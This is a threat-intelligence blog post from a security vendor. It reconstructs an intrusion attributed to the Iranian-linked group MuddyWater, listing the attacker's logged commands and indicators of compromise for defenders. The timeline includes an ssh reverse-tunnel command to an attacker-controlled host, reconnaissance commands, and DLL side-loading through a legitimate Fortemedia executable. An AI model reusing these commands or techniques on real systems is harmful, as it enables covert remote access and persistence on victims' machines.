Don’t let overlooked obligations become incidents. Learn how.
Utility navigation bar redirect icon
Portal LoginSupportContact
Search
Close search
Huntress Logo in Teal
  • Platform Overview
    Managed EDR

    Get full endpoint visibility, detection, and response.

    Managed EDR

    Get full endpoint visibility, detection, and response.

    Managed ITDR

    Protect your Microsoft 365 identities and email environments.

    Managed ITDR

    Protect your Microsoft 365 identities and email environments.

    Managed SIEM

    Managed threat response and robust compliance support at a predictable price.

    Managed SIEM

    Managed threat response and robust compliance support at a predictable price.

    Managed Security Awareness Training

    Empower your teams with science-backed security awareness training.

    Managed Security Awareness Training

    Empower your teams with science-backed security awareness training.

    Managed ISPM

    Continuous Microsoft 365 and identity hardening, managed and enforced by Huntress experts.

    Managed ISPM

    Continuous Microsoft 365 and identity hardening, managed and enforced by Huntress experts.

    Managed ESPM

    Proactively secure endpoints against attacks.

    Managed ESPM

    Proactively secure endpoints against attacks.

    Integrations
    Integrations
    Support Documentation
    Support Documentation
    See Huntress in Action

    Quickly deploy and manage real-time protection for endpoints, email, and employees - all from a single dashboard.

    Huntress Cybersecurity
    See Huntress in Action

    Quickly deploy and manage real-time protection for endpoints, email, and employees - all from a single dashboard.

    Huntress Cybersecurity
  • Threats We Stop
    Phishing
    Phishing
    Business Email Compromise
    Business Email Compromise
    Ransomware
    Ransomware
    Infostealers
    Infostealers
    View Allright arrowView Allright arrow
    Industries We Serve
    Education
    Education
    Financial Services
    Financial Services
    State and Local Government
    State and Local Government
    Healthcare
    Healthcare
    Law Firms
    Law Firms
    Manufacturing
    Manufacturing
    Utilities
    Utilities
    View Allright arrowView Allright arrow
    Tailored Solutions
    MSPs
    MSPs
    Resellers
    Resellers
    SMBs
    SMBs
    Compliance
    Compliance
    What Gets Overlooked Gets Exploited

    Most days, nothing happens. But one day, something will.

    Huntress Cybersecurity
    Cybercriminals Have Evolved

    Get the intel on today’s cybercriminal groups and learn how to protect yourself.

    Huntress Cybersecurity
  • Pricing
  • Community Series
    The Product Lab

    Shape the next big thing in cybersecurity together.

    The Product Lab

    Shape the next big thing in cybersecurity together.

    Fireside Chat

    Real people. Real perspectives. Better conversations.

    Fireside Chat

    Real people. Real perspectives. Better conversations.

    Tradecraft Tuesday

    No products, no pitches – just tradecraft.

    Tradecraft Tuesday

    No products, no pitches – just tradecraft.

    _declassified

    Exposing hidden truths in the world of cybersecurity.

    _declassified

    Exposing hidden truths in the world of cybersecurity.

    Resources
    Upcoming Events
    Upcoming Events
    Ebooks
    Ebooks
    On-Demand Webinars
    On-Demand Webinars
    Videos
    Videos
    Whitepapers
    Whitepapers
    Datasheets
    Datasheets
    Cybersecurity Education
    Cybersecurity 101
    Cybersecurity 101
    Cybersecurity Guides
    Cybersecurity Guides
    Threat Library
    Threat Library
    Real Tradecraft, Real Results
    Real Tradecraft, Real Results
    2026 Cyber Threat Report
    2026 Cyber Threat Report
    The Huntress Blog
    Huntress Lands on the Microsoft Marketplace
    Huntress Cybersecurity
    Huntress Lands on the Microsoft Marketplace
    Huntress Cybersecurity
    How Huntress & DEFCERT Are Streamlining CMMC Assessment Prep
    Huntress Cybersecurity
    How Huntress & DEFCERT Are Streamlining CMMC Assessment Prep
    Huntress Cybersecurity
    Live Hacking Into Microsoft 365 with Kyle Hanslovan
    Huntress Cybersecurity
    Live Hacking Into Microsoft 365 with Kyle Hanslovan
    Huntress Cybersecurity
  • Why Huntress

    Go beyond AI in the fight against today’s hackers with Huntress Managed EDR purpose-built for your needs

    Huntress Cybersecurity
    Why Huntress

    Go beyond AI in the fight against today’s hackers with Huntress Managed EDR purpose-built for your needs

    Huntress Cybersecurity
    The Huntress SOC

    24/7 Security Operations Center

    The Huntress SOC

    24/7 Security Operations Center

    Reviews

    Why businesses of all sizes trust Huntress to defend their assets

    Reviews

    Why businesses of all sizes trust Huntress to defend their assets

    Case Studies

    Learn directly from our partners how Huntress has helped them

    Case Studies

    Learn directly from our partners how Huntress has helped them

    Community

    Get in touch with the Huntress Community team

    Community

    Get in touch with the Huntress Community team

    Compare Huntress
    Bitdefender
    Bitdefender
    Blackpoint
    Blackpoint
    Breach Secure Now!
    Breach Secure Now!
    Crowdstrike
    Crowdstrike
    Datto
    Datto
    SentinelOne
    SentinelOne
    Sophos
    Sophos
    Compare Allright arrowCompare Allright arrow
  • HUNTRESS HUB

    Login to access top-notch marketing resources, tools, and training.

    Huntress Cybersecurity
    HUNTRESS HUB

    Login to access top-notch marketing resources, tools, and training.

    Huntress Cybersecurity
    Partners
    MSPs

    Join our partner community to deliver expert-led managed security.

    MSPs

    Join our partner community to deliver expert-led managed security.

    Resellers

    Partner program designed to grow your cybersecurity business.

    Resellers

    Partner program designed to grow your cybersecurity business.

    Tech Alliances

    Driving innovation through global technology Partnerships

    Tech Alliances

    Driving innovation through global technology Partnerships

    Microsoft Partnership

    A Level-Up for Your Business Security

    Microsoft Partnership

    A Level-Up for Your Business Security

  • Press Release
    Huntress Announces Collaboration with Microsoft to Strengthen Cybersecurity for Businesses of All Sizes
    Huntress Cybersecurity
    Press Release
    Huntress Announces Collaboration with Microsoft to Strengthen Cybersecurity for Businesses of All Sizes
    Huntress Cybersecurity
    Our Story

    We're on a mission to shatter the barriers to enterprise-level security.

    Our Story

    We're on a mission to shatter the barriers to enterprise-level security.

    Newsroom

    Explore press releases, news articles, media interviews and more.

    Newsroom

    Explore press releases, news articles, media interviews and more.

    Meet the Team

    Founded by former NSA Cyber Operators. Backed by security researchers.

    Meet the Team

    Founded by former NSA Cyber Operators. Backed by security researchers.

    Careers

    Ready to shake up the cybersecurity world? Join the hunt.

    Careers

    Ready to shake up the cybersecurity world? Join the hunt.

    Awards
    Awards
    Contact Us
    Contact Us
  • Portal Login
  • Support
  • Contact
  • Search
  • Get a Demo
  • Start for Free
Portal LoginSupportContact
Search
Close search
Get a Demo
Start for Free
HomeBlog
Clearing the Water: Unmasking an Attack Chain of MuddyWater
Published:
March 6, 2026

Clearing the Water: Unmasking an Attack Chain of MuddyWater

By:
Harlan Carvey
Jamie Levy
Share icon
Glitch effectGlitch effectGlitch effect


Acknowledgments: Special thanks to Tyler Marzen and Anna Pham for their contributions to this investigation and write-up.


TL;DR: Huntress has identified and detailed a full timeline of an intrusion in a customer environment that aligns with what others have identified as MuddyWater (Iranian-linked APT). The attack involved RDP initial access, establishing an SSH tunnel, and deploying malware via DLL side-loading using the legitimate FMAPP.exe to load a malicious FMAPP.dll for C2 communications.


Background

On March 4, 2026, Hunt.io published a blog regarding Iranian-linked APT infrastructure indicators. Figure 1 illustrates an excerpt of that blog.

Figure 1: Blog excerpt 

Huntress analysts used several of the indicators present in Figure 1 to conduct a retroactive hunt across available signals and incident reports to determine if any of these indicators had been observed across our extensive customer base.


Observations 

A search of historical data revealed an incident report sent on January 24, 2026, for a customer who is an Israeli company, regarding enumeration activity and a threat actor establishing an ssh connection. The signal related to the use of ssh appeared as follows:

C:\Windows\System32\OpenSSH\ssh.exe -p 22 -o StrictHostKeyChecking=no asuedulimit@162.0.230[.]185 -2 -4 -N -R 10841

Note that the IP address from the above command line is an IOC in this Group-IB report on MuddyWater.

The following day, a high-priority incident report for the same endpoint was sent to the customer, based on findings that aligned with those in Figure 1.

c:\Users\Public\Downloads\FMAPP.exe

This was an instance of DLL side-loading; that is, FMAPP.exe is a legitimate Fortemedia Inc. application, and when launched, loads FMAPP.dll from the same folder. It’s this DLL that contains the malicious code, and connects back to the C2 IP address, 157.20.182[.]49.


Detailed activity

The initial access to the endpoint was achieved through a Terminal Services/RDP login. A timeline excerpt developed from detection data appears as follows:

Figure 2: Timeline of activities

There are a few observations that we can make from some of the commands that were issued. For one, there are a few typos, which may imply that the attacker was actually typing some of these commands in and failing.

2026-01-24 22:15:57 whoami  /pric

2026-01-24 22:16:00 whoami  /priv

The attacker was operating inside a cmd.exe -> powershell.exe chain (the original RDP session environment). They deliberately opened a fresh PowerShell directly from Explorer; a cleaner, more stable process tree that looks more like a legitimate interactive user session. The three-minute window between the first tunnel and the new PowerShell session suggests the attacker paused to verify tunnel 10841 was working, possibly by attempting a connection through it from their end before proceeding. They then immediately re-established the tunnel from the new, more stable session. 

2026-01-24 22:22:03 ""C:\Windows\System32\OpenSSH\ssh.exe"" -p 22 -o StrictHostKeyChecking=no asuedulimit@162.0.230[.]185

 -2 -4 -N -R 10841

2026-01-24 22:25:48 ""C:\Windows\System32\WindowsPowerShell\v1\powershell.exe""

2026-01-24 22:26:48 ""C:\Windows\System32\OpenSSH\ssh.exe"" -p 22 -o StrictHostKeyChecking=no asuedulimit@162.0.230[.]185

 -2 -4 -N -R 8585 

There were a few more typos as the attacker continued their reconnaissance efforts:

2026-01-24 22:37:10 ""C:\Windows\system32\net.exe"" groups /do 

2026-01-24 22:38:40 ""C:\Windows\system32\net.exe"" group admi /do 

2026-01-24 22:39:06 whoami  /priv

2026-01-24 22:39:19 net  localgroup adminstraots

2026-01-24 22:39:29 net  localgroup administrators

They also appeared to have an issue with their C2 initially. You can see them run the FMAPP.exe executable to get their DLL loaded, then they run tasklist | findstr FMAPP in order to verify that it’s running. They then ping the C2 IP address in order to verify that the machine is online, and they check the IP address of the victim’s machine by connecting to ifconfig[.]me and attempt to run FMAPP.exe again:

2026-01-24 23:04:45 FMAPP.exe

2026-01-24 23:05:04 tasklist

2026-01-24 23:05:04 findstr  FMAPP

2026-01-24 23:05:44 ping  157.20.182[.]49 

2026-01-24 23:12:15 curl  ifconfig[.]me

2026-01-24 23:21:31 FMAPP.exe

After a few seconds have passed, they open another PowerShell session:

2026-01-25 00:14:32 powershell

The above timeline excerpt illustrates an end-to-end walkthrough of the threat actor’s activity, from the point that they logged into the endpoint via RDP, to the point where their continued activity was obviated via detections and response. This provides a detailed look at the threat actor’s workflow or playbook, which not only helps us better understand their process, but also provides insight into control efficacy to prevent this from occurring again, and to detect the activity much sooner. The full timeline of pertinent activities is as follows:

Loading Gist...


Indicators of compromise (IOCs)


Item

Description

173.16.10[.]1

IP address from initial RDP connection

162.0.230[.]185

IP address used with ssh

157.20.182[.]49

FMAPP.dll C2 IP address

asuedulimit

User name used with ssh

c:\Users\Public\Downloads\FMAPP.exe


SHA256: e25892603c42e34bd7ba0d8ea73be600d898cadc290e3417a82c04d6281b743b

Legitimate Fortemedia Inc. executable


c:\Users\Public\Downloads\FMAPP.dll


SHA256: 589ecb0bb31adc6101b9e545a4e5e07ae2e97d464b0a62242a498e613a7740b6

Malicious DLL used for the C2




Categories
Response to Incidents
Summarize this postClose Speech Bubble
ChatGPTClaudePerplexityGoogle AI

Step inside the dark world of cybercrime

Join us on March 18 (12pm EST) for _declassified, a raw intel drop where John Hammond and Jim Browning break down how modern cybercrime runs like a real business.
Register now
Share
Facebook iconTwitter X iconLinkedin iconDownload icon
Glitch effect

You Might Also Like

  • Advanced Persistent Threat Targeting Vietnamese Human Rights Defenders

    Huntress identified an intrusion against a non-profit supporting Vietnamese human rights that’s likely spanned years. Jump in as we provide a thorough analysis of this malicious threat actor.
  • Velociraptor Misuse, Pt. II: The Eye of the Storm

    Huntress reports an uptick in threat actors abusing the Velociraptor open-source DFIR tool, linked to incidents involving WSUS exploitation, VS Code tunnels, and more.
  • Wing FTP Server Remote Code Execution (CVE-2025-47812) Exploited in the Wild

    Huntress discovered active exploitation of Wing FTP Server RCE (CVE-2025-47812). Learn more about the injection flaw, attack timeline, forensic artifacts, and how to protect your organization.
  • The Crown Prince, Nezha: A New Tool Favored by China-Nexus Threat Actors

    Beginning in mid-2025, Huntress discovered a new tool being used to facilitate webserver intrusions known as Nezha, which up until now hasn’t been publicly reported on. This was used in tandem with other families of malware and web shell management tools such as Ghost RAT and AntSword.
  • When Trust Becomes a Trap: How Huntress Foiled a Medical Software Update Hack

    Hackers cloned a legitimate medical image viewer site to distribute malware, but thanks to Huntress, the threat was detected in time. Dive into the incident and see how we uncovered the deception and averted disaster.
  • Threat Intel Accelerates Detection & Response

    Evidence of a pre-existing exploit was rendered when the Huntress agent was added to an endpoint. Within minutes, and in part through the use of previously published threat intelligence, analysts were able to identify the issue and make recommendations to the customer to remediate the root cause.
  • Supply Chain Exploitation of SolarWinds Orion Software

    Huntress covers the breaking news about Solarwinds’ Orion platform being exploited as part of a coordinated attack to distribute malware.
  • Deep Dive: A LNK in the Chain

    Read this blog to learn more about what the Huntress team discovered with LNK.

Sign Up for Huntress Updates

Get insider access to Huntress tradecraft, killer events, and the freshest blog updates.
Privacy • Terms
By submitting this form, you accept our Terms of Service & Privacy Policy
Thank you! Your submission has been received!
Oops! Something went wrong while submitting the form.
Huntress Managed Security PlatformManaged EDRManaged EDR for macOSManaged EDR for LinuxManaged ITDRManaged SIEMManaged Security Awareness TrainingManaged ISPMManaged ESPMBook a Demo
PhishingComplianceBusiness Email CompromiseEducationFinanceHealthcareManufacturingState & Local Government
Managed Service ProvidersResellersIT & Security Teams24/7 SOCCase Studies
BlogResource CenterCybersecurity 101Upcoming EventsSupport Documentation
Our CompanyLeadershipNews & PressCareersContact Us
Huntress white logo

Protecting 215k+ customers like you with enterprise-grade protection.

Privacy PolicyCookie PolicyTerms of UseCookie Consent
Linkedin iconTwitter X iconYouTube iconInstagram icon
© 2025 Huntress All Rights Reserved.

Join the Hunt

Get insider access to Huntress tradecraft, killer events, and the freshest blog updates.

By submitting this form, you accept our Terms of Service & Privacy Policy